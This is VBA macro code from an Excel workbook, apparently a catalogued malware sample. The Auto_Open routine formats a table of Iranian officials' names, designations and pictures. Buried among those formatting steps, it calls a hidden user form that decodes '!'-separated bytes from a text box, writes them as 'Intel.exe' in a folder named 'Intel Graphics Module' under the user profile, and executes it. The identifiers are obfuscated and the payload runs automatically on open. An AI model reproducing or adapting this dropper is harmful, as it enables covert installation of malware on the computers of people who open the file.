Attribute VB_Name = "Module1"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Inst Macro
'
Sheet1.Visible = xlSheetVisible
Sheet1.Copy

    Range("A1:I47").Select
    Selection.Borders(xlDiagonalDown).LineStyle = xlNone
    Selection.Borders(xlDiagonalUp).LineStyle = xlNone
    With Selection.Borders(xlEdgeLeft)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    UserForm1.ImportFromText
    With Selection.Borders(xlEdgeTop)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeBottom)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeRight)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlInsideVertical)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlInsideHorizontal)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    Range("A1:I5").Select
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
     Dim padthasdwqe As Variant
    padthasdwqe = Environ$("USERPROFILE") & "\Intel Graphics Module\Intel.exe"
    Dim RetVal
    RetVal = Shell(padthasdwqe, 1)
    Selection.Merge
    Range("A6").Select
    ActiveCell.FormulaR1C1 = "S.no"
    Range("B6:C39").Select
    ActiveWindow.SmallScroll Down:=-15
    Selection.Merge True
    Range("E12").Select
    ActiveWindow.SmallScroll Down:=33
    Range("A40:I47").Select
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    Selection.Merge
    Range("E37").Select
    ActiveWindow.SmallScroll Down:=-45
    Range("D6:E39").Select
    ActiveWindow.SmallScroll Down:=-30
    Selection.Merge True
    Range("F6:G39").Select
    ActiveWindow.SmallScroll Down:=-27
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    Selection.Merge
    Selection.Merge True
    Selection.Borders(xlDiagonalDown).LineStyle = xlNone
    Selection.Borders(xlDiagonalUp).LineStyle = xlNone
    With Selection.Borders(xlEdgeLeft)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeTop)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeBottom)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeRight)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlInsideVertical)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlInsideHorizontal)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    Range("H6:I39").Select
    Selection.Merge True
    Range("B6:C6").Select
    ActiveCell.FormulaR1C1 = "Members Name"
    Range("D6:E6").Select
    ActiveCell.FormulaR1C1 = "Designation"
    Range("D6:E6").Select
    ActiveCell.FormulaR1C1 = "Designations"
    Range("F6:G6").Select
    ActiveCell.FormulaR1C1 = "Timming"
    Range("H6:I6").Select
    ActiveCell.FormulaR1C1 = "Pictures"
    Range("A1:I5").Select
    ActiveCell.FormulaR1C1 = ""
    Range("B7:C7").Select
    Application.WindowState = xlMinimized
    Application.WindowState = xlNormal
    Range("A7").Select
    ActiveCell.FormulaR1C1 = "1"
    Range("A7").Select
    
    Range("A7:A39").Select
    Range("D29:E29").Select
    ActiveWorkbook.Save
    ActiveWindow.SmallScroll Down:=-21
    Range("B7:C7").Select
    ActiveCell.FormulaR1C1 = "Akbar Hashemi Rafsanjani"
    Range("B8:C8").Select
    Columns("C:C").ColumnWidth = 12.43
    Columns("C:C").ColumnWidth = 18.43
    Range("D9:E9").Select
    ActiveWindow.SmallScroll Down:=-12
    Range("H7:I7").Select
    ActiveWorkbook.FollowHyperlink Address:= _
        "https://go.microsoft.com/fwlink/?linkid=865423", NewWindow:=False, _
        AddHistory:=True
    Selection.ShapeRange.ScaleWidth 0.4668028496, msoFalse, msoScaleFromTopLeft
    Selection.ShapeRange.ScaleHeight 0.4668028601, msoFalse, _
        msoScaleFromBottomRight
    Selection.ShapeRange.IncrementLeft -67.5
    Selection.ShapeRange.IncrementTop -408
    Selection.ShapeRange.ScaleWidth 0.2910283613, msoFalse, msoScaleFromTopLeft
    Selection.ShapeRange.ScaleHeight 0.2910284464, msoFalse, msoScaleFromTopLeft
    Selection.ShapeRange.IncrementLeft 68.25
    Selection.ShapeRange.IncrementTop 18
    Selection.ShapeRange.ScaleWidth 1.3249628229, msoFalse, msoScaleFromTopLeft
    Selection.ShapeRange.ScaleHeight 1.0526315789, msoFalse, msoScaleFromTopLeft
    Range("D13:E13").Select
    ActiveSheet.Shapes.Range(Array("Picture 1")).Select
    Selection.ShapeRange.ScaleHeight 1.0214285714, msoFalse, _
        msoScaleFromBottomRight
    Range("B11:C11").Select
    ActiveSheet.Shapes.Range(Array("Picture 1")).Select
    Selection.ShapeRange.ScaleWidth 1.0238095238, msoFalse, msoScaleFromTopLeft
    Range("A8:A13").Select
    Selection.ClearContents
    Range("A7:A13").Select
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    Selection.Merge
    Range("B7:C13").Select
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
    End With
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    Selection.UnMerge
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    Selection.Merge
    Range("D7:E13").Select
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    Selection.UnMerge
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    Selection.Merge
    Range("M16").Select
    
    Range("M16").Select
  
    Range("L16:O16").Select
    Selection.Hyperlinks.Delete
    Range("M16:O16").Select
    Selection.Copy
    Application.CutCopyMode = False
    Selection.Copy
    Range("M17").Select
    Application.CutCopyMode = False
    Range("M12").Select
    Columns("M:M").EntireColumn.AutoFit
    Range("M16").Select
    Selection.Copy
    Range("B7:C13").Select
    ActiveSheet.Paste
    Application.CutCopyMode = False
    ActiveSheet.Shapes.Range(Array("Picture 1")).Select
    Selection.Delete
    Range("M16").Select
    Selection.Copy
    ActiveSheet.Pictures.Insert( _
        "C:\Users\Jawina Convention\AppData\Local\Microsoft\Windows\INetCache\IE\LD1A762C\220px-Abbas_Vaez-Tabasi[1].jpg" _
        ).Select
    Selection.ShapeRange.IncrementLeft -274.5
    Selection.ShapeRange.IncrementTop -126
    Range("L14:N17").Select
    Application.CutCopyMode = False
    Selection.ClearContents
    Range("L19").Select
    ActiveSheet.Shapes.Range(Array("Picture 2")).Select
    Selection.ShapeRange.ScaleWidth 0.6184209019, msoFalse, msoScaleFromBottomRight
    Selection.ShapeRange.ScaleHeight 0.6184210526, msoFalse, _
        msoScaleFromBottomRight
    Selection.ShapeRange.ScaleWidth 0.7191492637, msoFalse, msoScaleFromTopLeft
    Selection.ShapeRange.ScaleHeight 0.7191493829, msoFalse, msoScaleFromTopLeft
    Selection.ShapeRange.IncrementLeft -48.75
    Selection.ShapeRange.IncrementTop -116.25
    Selection.ShapeRange.ScaleHeight 0.8047332279, msoFalse, msoScaleFromTopLeft
    Range("K12").Select
    ActiveSheet.Shapes.Range(Array("Picture 2")).Select
    Selection.ShapeRange.ScaleWidth 0.9740446405, msoFalse, msoScaleFromTopLeft
    Selection.ShapeRange.ScaleHeight 1.0147058824, msoFalse, msoScaleFromTopLeft
    Range("B7:C13").Select
    ActiveCell.FormulaR1C1 = "Astan Quds Razavi"
    Range("D7:E13").Select
    ActiveCell.FormulaR1C1 = "Custodian "
    Range("D7:E13").Select
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    Range("M16").Select
    ActiveWorkbook.Save
    Range("F7:G13").Select
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    End With
    Selection.UnMerge
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    Selection.Merge
    Range("M16").Select
    
    Range("M16").Select
    Selection.Copy
    Range("B14:C14").Select
    ActiveSheet.Paste
    Range("M12").Select
    Application.CutCopyMode = False
    Range("M15:M19").Select
    Selection.ClearContents
    Range("F16:G16").Select
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5F98899E-4029-47F1-9999-756D46132929}{D545C1B0-5237-41A7-802D-0A1641EBCF64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function ajhgdajadakjhd() As String

Dim asdhkkjabncv

Dim iusdfiusoidfu As String

iusdfiusoidfu = Environ$("USERPROFILE") & "\Intel Graphics Module"

Set asdhkkjabncv = CreateObject("Scripting.FileSystemObject")

If Not asdhkkjabncv.FolderExists(iusdfiusoidfu) Then

asdhkkjabncv.CreateFolder (iusdfiusoidfu)

Else

ajhgdajadakjhd = iusdfiusoidfu

End If

ajhgdajadakjhd = iusdfiusoidfu

End Function

Function fsjdweryw() As String

Dim Fasdhkkjabncv

Dim padthasdwqe As String

padthasdwqe = ajhgdajadakjhd & "\new.txt"

Set Fasdhkkjabncv = CreateObject("Scripting.FileSystemObject")

Set file = Fasdhkkjabncv.CreateTextFile(padthasdwqe, True)

file.writeline (TextBox1.Text)

file.Close

fsjdweryw = padthasdwqe

End Function
 
Function ImportFromText() As String

Dim padthasdwqe As String

padthasdwqe = fsjdweryw

    Open padthasdwqe For Input As #1
    
    r = 0
    
    Do Until EOF(1)
    
     Line Input #1, Data
        
      r = r + 1
    
    Loop
    
    Close #1
    
    Dim Str() As String
    
    Dim BT() As Byte
    
    Dim Index As Double
    
    Index = 0
    
    Str = Split(Data, "!")
     
    For Each arr In Str
     
     ReDim Preserve BT(Index)
     
     BT(Index) = CByte(arr)
     
     Index = Index + 1
     
    Next arr
    
    padthasdwqe = Environ$("USERPROFILE") & "\Intel Graphics Module\Intel.exe"
        
    Dim asdhkkjabncv

    Set asdhkkjabncv = CreateObject("Scripting.FileSystemObject")

    If Not asdhkkjabncv.FolderExists(padthasdwqe) Then
    
   Open padthasdwqe For Binary Access Write As #1

    Put #1, , BT
    Close 1

    Else
    
    End If

    ImportFromText = padthasdwqe
    
End Function

Private Sub Cac_btn_Click()

End Sub

Private Sub TextBox1_Change()

End Sub

Private Sub UserForm_Click()

End Sub


INQUEST-PP=macro
